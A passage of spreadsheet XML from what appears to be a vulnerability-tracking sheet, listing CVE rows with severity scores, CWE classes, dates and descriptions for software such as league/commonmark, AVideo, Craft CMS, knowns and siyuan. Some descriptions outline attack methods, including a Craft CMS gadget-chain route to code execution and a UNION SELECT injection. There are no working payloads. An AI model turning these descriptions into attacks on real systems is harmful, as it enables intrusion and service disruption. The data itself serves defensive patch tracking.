          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86195</t>
        </is>
      </c>
    </row>
    <row r="1333">
      <c r="A1333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86196</t>
        </is>
      </c>
      <c r="C1333" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1333" s="5" t="inlineStr"/>
      <c r="F1333" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1333" s="5" t="inlineStr"/>
      <c r="H1333" s="5" t="inlineStr"/>
      <c r="I1333" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1333" s="5" t="inlineStr"/>
      <c r="K1333" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L1333" s="5" t="inlineStr">
        <is>
          <t>Grav API plugin versions before 1.0.20 build password reset links from the untrusted Host header in the forgot-password endpoint, allowing unauthenticated attackers to redirect reset tokens to attacker-controlled domains. Attackers can send password reset requests for any account with a malicious Host header, intercept the reset token from victim emails, and complete account takeover including super-admin accounts.</t>
        </is>
      </c>
      <c r="M1333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86196</t>
        </is>
      </c>
    </row>
    <row r="1334">
      <c r="A1334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86199</t>
        </is>
      </c>
      <c r="C1334" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1334" s="5" t="inlineStr"/>
      <c r="F1334" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1334" s="5" t="inlineStr"/>
      <c r="H1334" s="5" t="inlineStr"/>
      <c r="I1334" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1334" s="5" t="inlineStr"/>
      <c r="K1334" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L1334" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.43.1 fail to properly validate the Certificate field during offline login authentication. Unauthenticated players can trigger an uninitialized property access error that crashes the server.</t>
        </is>
      </c>
      <c r="M1334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86199</t>
        </is>
      </c>
    </row>
    <row r="1335">
      <c r="A1335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86201</t>
        </is>
      </c>
      <c r="C1335" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1335" s="5" t="inlineStr"/>
      <c r="F1335" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1335" s="5" t="inlineStr"/>
      <c r="H1335" s="5" t="inlineStr"/>
      <c r="I1335" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1335" s="5" t="inlineStr"/>
      <c r="K1335" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1335" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.41.1 contains a denial of service vulnerability in LoginPacket processing where large or complex structures in unknown clientData JWT properties cause excessive logging without sanitization. Attackers can send crafted LoginPackets with deeply nested or massive object structures to trigger out-of-memory conditions and crash the server.</t>
        </is>
      </c>
      <c r="M1335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86201</t>
        </is>
      </c>
    </row>
    <row r="1336">
      <c r="A1336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86250</t>
        </is>
      </c>
      <c r="C1336" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1336" s="5" t="inlineStr"/>
      <c r="F1336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1336" s="5" t="inlineStr"/>
      <c r="H1336" s="5" t="inlineStr"/>
      <c r="I1336" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1336" s="5" t="inlineStr"/>
      <c r="K1336" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1336" s="5" t="inlineStr">
        <is>
          <t>h3 versions before 2.0.1-rc.18 fail to validate the chunk count parsed from user-controlled cookie values in setChunkedCookie() and deleteChunkedCookie() functions. Attackers can send a crafted cookie header with an extremely large chunk count to trigger an O(n²) cleanup loop that hangs the server process.</t>
        </is>
      </c>
      <c r="M1336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86250</t>
        </is>
      </c>
    </row>
    <row r="1337">
      <c r="A1337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86427</t>
        </is>
      </c>
      <c r="C1337" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1337" s="5" t="inlineStr"/>
      <c r="F1337" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1337" s="5" t="inlineStr"/>
      <c r="H1337" s="5" t="inlineStr"/>
      <c r="I1337" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1337" s="5" t="inlineStr"/>
      <c r="K1337" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1337" s="5" t="inlineStr">
        <is>
          <t>LibreNMS before 26.8.0 contains an argument injection vulnerability in the graph_title parameter that allows authenticated attackers to inject arbitrary rrdtool arguments by breaking out of double-quote escaping. Attackers can inject DEF and LINE arguments to read RRD files from unauthorized devices, or use newline injection to execute arbitrary rrdtool commands, bypassing per-device authorization checks.</t>
        </is>
      </c>
      <c r="M1337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86427</t>
        </is>
      </c>
    </row>
    <row r="1338">
      <c r="A1338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86428</t>
        </is>
      </c>
      <c r="C1338" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1338" s="5" t="inlineStr"/>
      <c r="F1338" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1338" s="5" t="inlineStr"/>
      <c r="H1338" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="I1338" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1338" s="5" t="inlineStr"/>
      <c r="K1338" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1338" s="5" t="inlineStr">
        <is>
          <t>commonmark versions from 1.5.0 before 2.10.0 contain a denial of service vulnerability in the AttributesExtension when processing distinctly-named attributes. Attackers can submit Markdown with numerous distinct attribute names to cause quadratic-time attribute merging and filtering, consuming disproportionate CPU resources and preventing legitimate requests from completing.</t>
        </is>
      </c>
      <c r="M1338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86428</t>
        </is>
      </c>
    </row>
    <row r="1339">
      <c r="A1339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86429</t>
        </is>
      </c>
      <c r="C1339" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1339" s="5" t="inlineStr"/>
      <c r="F1339" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1339" s="5" t="inlineStr"/>
      <c r="H1339" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="I1339" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1339" s="5" t="inlineStr"/>
      <c r="K1339" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1339" s="5" t="inlineStr">
        <is>
          <t>The league/commonmark (thephpleague/commonmark) library in versions &gt;= 1.5.0 and &lt; 2.9.1 contains quadratic parsing complexity in its SmartPunctExtension and AttributesExtension. When either extension is explicitly registered on the Environment (they are not enabled by default and are excluded from the standard CommonMark and GitHub-Flavored Markdown converters), an unauthenticated attacker can submit small, specially crafted Markdown documents — such as text alternating with unpaired quotes, contiguous runs of block-level attribute blocks, or repeated class attributes — to trigger disproportionate CPU consumption and cause a denial of service. Fixed in 2.9.1.</t>
        </is>
      </c>
      <c r="M1339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86429</t>
        </is>
      </c>
    </row>
    <row r="1340">
      <c r="A1340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86430</t>
        </is>
      </c>
      <c r="C1340" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1340" s="5" t="inlineStr"/>
      <c r="F1340" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1340" s="5" t="inlineStr"/>
      <c r="H1340" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="I1340" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1340" s="5" t="inlineStr"/>
      <c r="K1340" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1340" s="5" t="inlineStr">
        <is>
          <t>league/commonmark versions before 2.9.1 contain multiple denial of service vulnerabilities in fenced code block detection, reference link label lookup, and emphasis delimiter processing that perform super-linear work on crafted input. Attackers can submit specially crafted Markdown with long backtick runs, nested brackets, or delimiter sequences to consume disproportionate CPU time and prevent legitimate requests from completing.</t>
        </is>
      </c>
      <c r="M1340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86430</t>
        </is>
      </c>
    </row>
    <row r="1341">
      <c r="A1341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86433</t>
        </is>
      </c>
      <c r="C1341" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1341" s="5" t="inlineStr"/>
      <c r="F1341" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1341" s="5" t="inlineStr"/>
      <c r="H1341" s="5" t="inlineStr"/>
      <c r="I1341" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1341" s="5" t="inlineStr"/>
      <c r="K1341" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1341" s="5" t="inlineStr">
        <is>
          <t>commonmark versions from 1.5.0 before 2.8.4 contain a denial of service vulnerability in the Attributes extension where AttributesListener::findTargetAndDirection() performs quadratic-time sibling list scanning. Unauthenticated attackers can submit approximately 32 KB of repeated attribute blocks to cause parsing to take over 5 seconds, exhausting server resources.</t>
        </is>
      </c>
      <c r="M1341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86433</t>
        </is>
      </c>
    </row>
    <row r="1342">
      <c r="A1342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86434</t>
        </is>
      </c>
      <c r="C1342" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1342" s="5" t="inlineStr"/>
      <c r="F1342" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1342" s="5" t="inlineStr"/>
      <c r="H1342" s="5" t="inlineStr"/>
      <c r="I1342" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1342" s="5" t="inlineStr"/>
      <c r="K1342" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1342" s="5" t="inlineStr">
        <is>
          <t>league/commonmark versions &gt;= 2.0.0 and &lt; 2.8.4 (patched in 2.9.0) contain a denial of service vulnerability in UniqueSlugNormalizer::normalize(), which restarts its numeric-suffix search from 1 on every slug collision, resulting in O(K^2) time complexity for K headings that collapse to the same base slug. The vulnerable path is reached when HeadingPermalinkExtension, FootnoteExtension, or TableOfContentsExtension is registered. An unauthenticated attacker can force many headings onto a single base slug (e.g., via empty ATX headings, identical heading text, or punctuation-only headings) in a small Markdown document, consuming excessive CPU and denying service.</t>
        </is>
      </c>
      <c r="M1342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86434</t>
        </is>
      </c>
    </row>
    <row r="1343">
      <c r="A1343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86435</t>
        </is>
      </c>
      <c r="C1343" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1343" s="5" t="inlineStr"/>
      <c r="F1343" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1343" s="5" t="inlineStr"/>
      <c r="H1343" s="5" t="inlineStr"/>
      <c r="I1343" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1343" s="5" t="inlineStr"/>
      <c r="K1343" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1343" s="5" t="inlineStr">
        <is>
          <t>commonmark versions from 1.5.0 before 2.8.4 contain a denial of service vulnerability in the Footnote extension that fails to deduplicate footnote definitions. Attackers can craft documents with duplicate footnote definitions and references to create quadratic output expansion, consuming excessive memory and CPU to exhaust server resources.</t>
        </is>
      </c>
      <c r="M1343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86435</t>
        </is>
      </c>
    </row>
    <row r="1344">
      <c r="A1344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86439</t>
        </is>
      </c>
      <c r="C1344" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1344" s="5" t="inlineStr"/>
      <c r="F1344" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1344" s="5" t="inlineStr"/>
      <c r="H1344" s="5" t="inlineStr"/>
      <c r="I1344" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1344" s="5" t="inlineStr"/>
      <c r="K1344" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1344" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 fail to validate filesystem paths in MCP tool arguments, allowing attackers to read, create, overwrite and delete files outside the project directory. Attackers can supply path arguments containing directory traversal sequences to access arbitrary Markdown files accessible to the server process.</t>
        </is>
      </c>
      <c r="M1344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86439</t>
        </is>
      </c>
    </row>
    <row r="1345">
      <c r="A1345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86452</t>
        </is>
      </c>
      <c r="C1345" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1345" s="5" t="inlineStr"/>
      <c r="F1345" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1345" s="5" t="inlineStr"/>
      <c r="H1345" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I1345" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1345" s="5" t="inlineStr"/>
      <c r="K1345" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1345" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP permit unauthenticated or weakly constrained request paths to perform persistent work without adequate input bounds or rate limiting.
The users/forgot password-reset endpoint accepted an attacker-controlled email value without first imposing a reasonable length bound or validating its format. That value was then used to create an audit log entry and queue a password-reset job, causing the supplied value to be persisted more than once per request. The commit explicitly states that an unbounded unauthenticated request field was stored twice per call with no throttle.
The fix adds:
  *  
a maximum email input length of 1024 bytes;
  *  
email-format validation before persistent work;
  *  
a per-source pre-authentication request budget;
  *  
HTTP 429 responses when that budget is exceeded;
  *  
a 15-minute cooldown for API-access request emails;
  *  
POST-only handling and CSRF protection for the API-access request endpoint.
The new flood filter is specifically intended to limit persistent storage costs from anonymous requests such as password resets, registrations, and failed REST authentication attempts.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M1345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86452</t>
        </is>
      </c>
    </row>
    <row r="1346">
      <c r="A1346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86538</t>
        </is>
      </c>
      <c r="C1346" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1346" s="5" t="inlineStr"/>
      <c r="F1346" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1346" s="5" t="inlineStr"/>
      <c r="H1346" s="5" t="inlineStr"/>
      <c r="I1346" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1346" s="5" t="inlineStr"/>
      <c r="K1346" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1346" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 contain a path traversal vulnerability in the POST /api/templates/preview endpoint that allows unauthenticated attackers to read arbitrary files. Attackers can supply directory traversal sequences in the templateFile parameter to bypass path restrictions and read sensitive files like credentials and configuration through the JSON response.</t>
        </is>
      </c>
      <c r="M1346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86538</t>
        </is>
      </c>
    </row>
    <row r="1347">
      <c r="A1347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86721</t>
        </is>
      </c>
      <c r="C1347" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1347" s="5" t="inlineStr"/>
      <c r="F1347" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1347" s="5" t="inlineStr"/>
      <c r="H1347" s="5" t="inlineStr"/>
      <c r="I1347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1347" s="5" t="inlineStr"/>
      <c r="K1347" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1347" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c contains an authorization bypass vulnerability where a session cookie named 'key' with value 'value' overrides the $_REQUEST['key'] parameter in saveLive.php and related endpoints. Attackers can publish to any user's RTMP stream without authentication by using the known constant stream key value to hijack live broadcasts.</t>
        </is>
      </c>
      <c r="M1347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86721</t>
        </is>
      </c>
    </row>
    <row r="1348">
      <c r="A1348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86727</t>
        </is>
      </c>
      <c r="C1348" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1348" s="5" t="inlineStr"/>
      <c r="F1348" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1348" s="5" t="inlineStr"/>
      <c r="H1348" s="5" t="inlineStr"/>
      <c r="I1348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1348" s="5" t="inlineStr"/>
      <c r="K1348" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1348" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains an information disclosure vulnerability in plugin/Live/stats.json.php that allows unauthenticated attackers to retrieve stream keys and m3u8 URLs by accessing the endpoint without authentication. Attackers can enumerate private, unlisted, and group-restricted live streams by parsing the hidden_applications array in the JSON response to obtain sensitive streaming credentials.</t>
        </is>
      </c>
      <c r="M1348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86727</t>
        </is>
      </c>
    </row>
    <row r="1349">
      <c r="A1349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86728</t>
        </is>
      </c>
      <c r="C1349" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1349" s="5" t="inlineStr"/>
      <c r="F1349" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1349" s="5" t="inlineStr"/>
      <c r="H1349" s="5" t="inlineStr"/>
      <c r="I1349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1349" s="5" t="inlineStr"/>
      <c r="K1349" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1349" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains an authentication bypass vulnerability in plugin/PlayLists/epg.json.php that exposes live-stream keys and private EPG schedules to unauthenticated users. Attackers can request the endpoint with sequential user or playlist IDs to retrieve sensitive credentials, server identifiers, and complete programme schedules without authentication.</t>
        </is>
      </c>
      <c r="M1349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86728</t>
        </is>
      </c>
    </row>
    <row r="1350">
      <c r="A1350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86730</t>
        </is>
      </c>
      <c r="C1350" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1350" s="5" t="inlineStr"/>
      <c r="F1350" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1350" s="5" t="inlineStr"/>
      <c r="H1350" s="5" t="inlineStr"/>
      <c r="I1350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1350" s="5" t="inlineStr"/>
      <c r="K1350" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1350" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions before 5.10.12 fail to properly cleanse string-typed field-layout elements, allowing authenticated control-panel users to inject Yii2 behavior attachments and event handlers. Attackers can post field-layout tab elements as JSON strings to bypass cleanse validation, then trigger arbitrary object instantiation and code execution through Craft::createObject().</t>
        </is>
      </c>
      <c r="M1350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86730</t>
        </is>
      </c>
    </row>
    <row r="1351">
      <c r="A1351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86732</t>
        </is>
      </c>
      <c r="C1351" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1351" s="5" t="inlineStr"/>
      <c r="F1351" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1351" s="5" t="inlineStr"/>
      <c r="H1351" s="5" t="inlineStr"/>
      <c r="I1351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1351" s="5" t="inlineStr"/>
      <c r="K1351" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1351" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions before 5.10.12 contain a remote code execution vulnerability in the element-index endpoint that allows authenticated content editors to instantiate arbitrary classes through the criteria parameter. Attackers can inject a malicious class via criteria[withTransforms][0][class] that reaches ImageTransforms::normalizeTransform(), then use a PHP gadget chain with yii\rbac\PhpManager to execute code by pointing itemFile to a request log containing PHP payload in the User-Agent header.</t>
        </is>
      </c>
      <c r="M1351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86732</t>
        </is>
      </c>
    </row>
    <row r="1352">
      <c r="A1352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87807</t>
        </is>
      </c>
      <c r="C1352" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1352" s="5" t="inlineStr"/>
      <c r="F1352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1352" s="5" t="inlineStr"/>
      <c r="H1352" s="5" t="inlineStr"/>
      <c r="I1352" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1352" s="5" t="inlineStr"/>
      <c r="K1352" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1352" s="5" t="inlineStr">
        <is>
          <t>siyuan versions before v3.8.2 contain an authenticated SQL injection vulnerability in the fullTextSearchBlock endpoint's method=1 query parameter. Attackers can inject UNION SELECT statements to read the entire blocks table, bypassing publish-access controls and exposing all document content and sensitive attributes.</t>
        </is>
      </c>
      <c r="M1352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87807</t>
        </is>
      </c>
    </row>
    <row r="1353">
      <c r="A1353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87808</t>
        </is>
      </c>
      <c r="C1353" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1353" s="5" t="inlineStr"/>
      <c r="F1353" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1353" s="5" t="inlineStr"/>
      <c r="H1353" s="5" t="inlineStr"/>
      <c r="I1353" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1353" s="5" t="inlineStr"/>
      <c r="K1353" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1353" s="5" t="inlineStr">
        <is>
